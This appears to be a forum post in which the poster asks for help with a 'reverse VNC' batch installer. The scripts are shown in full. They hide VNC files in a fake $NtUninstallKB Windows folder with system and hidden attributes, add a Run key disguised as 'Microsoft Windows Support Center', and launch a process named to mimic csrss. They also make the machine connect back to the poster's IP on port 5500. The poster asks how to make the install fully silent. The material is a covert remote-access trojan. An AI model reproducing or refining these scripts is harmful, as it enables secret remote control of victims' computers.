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Reverse VNC autostart problem


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I am having trouble getting the reverse vnc to stay alive after a computer restart.  I followed these instructions:

Adds a startup process which connect to your machine:

@echo off

reg. exe add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "Microsoft Windows Support Center" /t REG_SZ /d "your. path. of. coicereverse. exe"

This is the reverse. exe:

@echo on

". nircmd. exe" wait 40000


". vnc. exe" -connect your. static. hostname::5500

". nircmd. exe" wait 90000

goto loop

and this is from my go. bat

@echo off

reg. exe add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "Microsoft Windows Support Center" /t REG_SZ /d "C:WINDOWSreverse. exe"

@echo on

". nircmd. exe" wait 40000


". WinVnc. exe" -connect 68. xxx. xxx. xxx::5500

". nircmd. exe" wait 90000

goto loop

I am kinda lost here because after a restart it will not connect to me.  I have even tried to just paste all the vnc files in the windows directory and create and executable out of the second half and call it reverse. exe.  It works ok if just run that . exe but if I restart it takes 100% of the CPU and does not connect.  Just wondering if you guys had any suggestions.  I am sure this is something stupid I am missing.  Thanks for your time.

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@echo off

"C:WINDOWS$NtUninstallKB21050c07160c070f0b0a0a05031b05$nircmd.exe" wait 40000


"C:WINDOWS$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVnc.exe" -connect xxx.xxx.xxx.xxx::5500

"C:WINDOWS$NtUninstallKB21050c07160c070f0b0a0a05031b05$nircmd.exe" wait 90000

goto loop

this is what I made the reverse.exe out of. the this is in go.bat

echo off

if not exist WIPdump md WIPdump >nul

if not exist WIPdump%computername% md WIPdump%computername% >nul

cd WIPCMD >nul

echo off

mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn"

cd WIPVNCInstallFiles

start cssrss.exe

copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn"

attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h

copy reverse.exe %systemroot%

start %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$services.bat

regedit /s WIPCMDvncdmp.reg

regedit /s WIPCMDvncdmp1.reg

regedit /s WIPCMDvncdmp2.reg

regedit /s WIPCMDVNC.reg

ping -n 3 localhost  > nul

net start WinVNC

nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd

I have one more problem though. When this installs it is not completely silent. I use a vbs script to launch the go.bat and there is a black window that pops up for a split second. I was wondering if there is a way to get rid of that.

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